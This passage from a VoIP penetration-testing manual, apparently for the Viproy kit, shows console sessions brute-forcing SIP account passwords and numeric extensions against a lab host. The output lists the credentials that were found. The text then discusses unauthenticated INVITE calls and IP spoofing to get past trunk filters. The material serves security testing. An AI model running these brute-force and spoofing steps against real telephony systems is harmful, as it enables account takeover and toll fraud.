[*] Trying username:'2000' with password:'1244' [*] 172.16.100.6:5060 - [04/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth) [*] Trying username:'2000' with password:'dene' [*] 172.16.100.6:5060 - [05/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth) [*] Trying username:'2000' with password:'password123' [+] user : 2000 password : password123 result : Request Succeed [*] Trying username:'2000' with password:'lsadhflkajshf' [*] 172.16.100.6:5060 - [07/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth) [*] Trying username:'2000' with password:'s3cur3' [*] 172.16.100.6:5060 - [08/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth) [*] Trying username:'2000' with password:'letmein123' [*] 172.16.100.6:5060 - [09/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth) [*] Trying username:'2000' with password:'secret123' [*] 172.16.100.6:5060 - [10/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth) [*] Trying username:'2000' with password:'quit3s3cure123' [*] 172.16.100.6:5060 - [11/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth) Brute Forcing a Valid Account with a Password File Second Case : Brute Forcing an Account File with a Password File Holdenusploit auxiliary(gsipbruteforce) # show options Module options (auxiliary/gamasec/sip/gsipbruteforce): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 CHOST no The local client address CPORT 5065 no The local client port DEBUG false no Debug Level DEREGISTER false yes DeRegister After Successful Login FROM 1000 no The source username to Viproy VoIP Penetration Testing Kit Sayfa 25

probe METHOD REGISTER yes The method for Brute Forcing (REGISTER) NUMERIC_MAX 9999 yes Ending extension NUMERIC_MIN 0 yes Starting extension NUMERIC_USERS false yes Numeric Username Bruteforcing PASSWORD NOPASSWORD no The login password to probe PASS_FILE no File containing passwords, one per line REALM realm.com.tr yes The login realm to probe RHOST yes The target address RPORT 5060 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads TO 1000 no The destination username to probe USERNAME NOUSER no The login username to probe USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_FROM_and_TO true yes Try the username as the from/to for all users USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts Holdenusploit auxiliary(gsipbruteforce) # set RHOST 172.16.100.6 RHOST => 172.16.100.6 Holdenusploit auxiliary(gsipbruteforce) # set USER_FILE "/tmp/users" USER_FILE => /tmp/users Holdenusploit auxiliary(gsipbruteforce) # set PASS_FILE "/tmp/passwords" PASS_FILE => /tmp/passwords Holdenusploit auxiliary(gsipbruteforce) # unset USERNAME Unsetting USERNAME... Holdenusploit auxiliary(gsipbruteforce) # set VERBOSE false VERBOSE => false Holdenusploit auxiliary(gsipbruteforce) # run Viproy VoIP Penetration Testing Kit Sayfa 26

[+] user : 100 password : result : Request Succeed without Login Information [+] user : 100 password : NOPASSWORD result : Request Succeed without Login Information [+] user : 2000 password : password123 result : Request Succeed [+] user : 100 password : deneme1234 result : Request Succeed without Login Information [+] user : 100 password : 1244 result : Request Succeed without Login Information [+] user : 100 password : dene result : Request Succeed without Login Information [+] user : 100 password : password123 result : Request Succeed without Login Information [+] user : 100 password : lsadhflkajshf result : Request Succeed without Login Information [+] user : 100 password : s3cur3 result : Request Succeed without Login Information [+] user : 100 password : letmein123 result : Request Succeed without Login Information [+] user : 100 password : secret123 result : Request Succeed without Login Information [+] user : 100 password : quit3s3cure123 result : Request Succeed without Login Information Brute Forcing a Account File with a Password File Third Case : Brute Forcing a Numeric Range (0-2100) with a Password File Holdenusploit auxiliary(gsipbruteforce) # show options Module options (auxiliary/gamasec/sip/gsipbruteforce): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 CHOST no The local client address CPORT 5065 no The local client port DEBUG false no Debug Level DEREGISTER false yes DeRegister After Successful Login FROM 1000 no The source username to Viproy VoIP Penetration Testing Kit Sayfa 27

probe METHOD REGISTER yes The method for Brute Forcing (REGISTER) NUMERIC_MAX 9999 yes Ending extension NUMERIC_MIN 0 yes Starting extension NUMERIC_USERS false yes Numeric Username Bruteforcing PASSWORD NOPASSWORD no The login password to probe PASS_FILE no File containing passwords, one per line REALM realm.com.tr yes The login realm to probe RHOST yes The target address RPORT 5060 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads TO 1000 no The destination username to probe USERNAME NOUSER no The login username to probe USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_FROM_and_TO true yes Try the username as the from/to for all users USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts Holdenusploit auxiliary(gsipbruteforce) # unset USER_FILE Unsetting USER_FILE... Holdenusploit auxiliary(gsipbruteforce) # unset PASS_FILE Unsetting PASS_FILE... Holdenusploit auxiliary(gsipbruteforce) # set NUMERIC_USERS true NUMERIC_USERS => true Holdenusploit auxiliary(gsipbruteforce) # set NUMERIC_MAX 2100 NUMERIC_MAX => 2100 Holdenusploit auxiliary(gsipbruteforce) # set PASS_FILE "/tmp/passwords" PASS_FILE => /tmp/passwords Holdenusploit auxiliary(gsipbruteforce) # run Viproy VoIP Penetration Testing Kit Sayfa 28

[+] user : 100 password : NOPASSWORD result : Request Succeed without Login Information [+] user : 100 password : deneme1234 result : Request Succeed without Login Information [+] user : 100 password : 1244 result : Request Succeed without Login Information [+] user : 100 password : dene result : Request Succeed without Login Information [+] user : 100 password : password123 result : Request Succeed without Login Information [+] user : 100 password : lsadhflkajshf result : Request Succeed without Login Information [+] user : 100 password : s3cur3 result : Request Succeed without Login Information [+] user : 100 password : letmein123 result : Request Succeed without Login Information [+] user : 100 password : secret123 result : Request Succeed without Login Information [+] user : 100 password : quit3s3cure123 result : Request Succeed without Login Information [+] user : 101 password : s3cur3 result : Request Succeed [+] user : 102 password : letmein123 result : Request Succeed [+] user : 200 password : quit3s3cure123 result : Request Succeed [+] user : 201 password : secret123 result : Request Succeed [+] user : 2000 password : password123 result : Request Succeed Brute Forcing Numeric Accounts with a Password File Viproy VoIP Penetration Testing Kit Sayfa 29

3 Authorization Analysis of SIP Services 3.1 Direct Invite Attempt As mentioned above, Authentication function depends on SIP service features and role. Authentication feature could be not required or initiated on SIP trunks, SIP clients and default installations. Generally, SIP trunks defined as an IP address or specific FROM number. Challenge response or certificate based authentication is slow for quick response in this type of large call counts. Because of that, SIP trunks have no password or IP based filter applied for trunk authentication. These SIP trunks use specific FROM numbers or Proxy fields to initiate a call. Many SIP clients have REGISTER and INVITE support without authentication. SIP servers and devices cannot authenticate users without right configuration, most of default installations do not support authentication. Moreover, SIP servers have special target numbers to accept call for voice message box, value added services or gateways. Registration without password is possible in this kind of configuration. Based on these informations, all SIP servers should be analyzed for call initiation without authentication. Depends on the cases that mentioned above, Invite requests INVITE method should be used to initiate a call to a target number, also this method supports authentication. Authentication feature will be required later, but this test should be performed to detect the valid target numbers without authentication. My invite module could be used for INVITE tests, it supports basic INVITE options. Important Informations for INVITE Tests Many SIP clients accept calls without authentication and ignore TO field of INVITE request. Because of this problem, Invite tests should not be automated to SIP clients. Only one INVITE request should send to service and SIP clients' state should be checked after test. IP based filtering is the most preferred way for SIP trunk placement. SIP service accepts calls without authentication if they send by a valid IP address and UDP Port. IP spoofing will be required to bypass this type of restriction, this will be discussed SIP requests with IP spoofing. Viproy VoIP Penetration Testing Kit Sayfa 30

It is dangerous that incremental target number fuzzing in INVITE tests, because all numbers will ring same time and this is Denial of Service attack. Last but not at all least, VIA/FROM/TO fields depend each other. All tests should be performed with proper INVITE request, invalid INVITE requests give unreliable results. For example, the target number 131 could accept calls only 100, because 100 is international gateway. In the next test, direct INVITE requests sent to the target SIP service. The result is 401 Unauthorized if the target number is our valid account 2000. As mentioned in the important information section, FROM and TO field should be changed for test reliability. Viproy VoIP Penetration Testing Kit Sayfa 31